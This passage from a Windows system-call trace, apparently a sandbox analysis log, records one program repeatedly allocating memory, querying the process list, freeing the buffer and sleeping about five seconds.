BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.154] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.161] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.167] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.189] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.195] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.202] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.208] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.222] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.228] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.235] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.250] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.256] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.264] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.271] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.278] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.284] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.286] NtQuerySystemInformation (in: 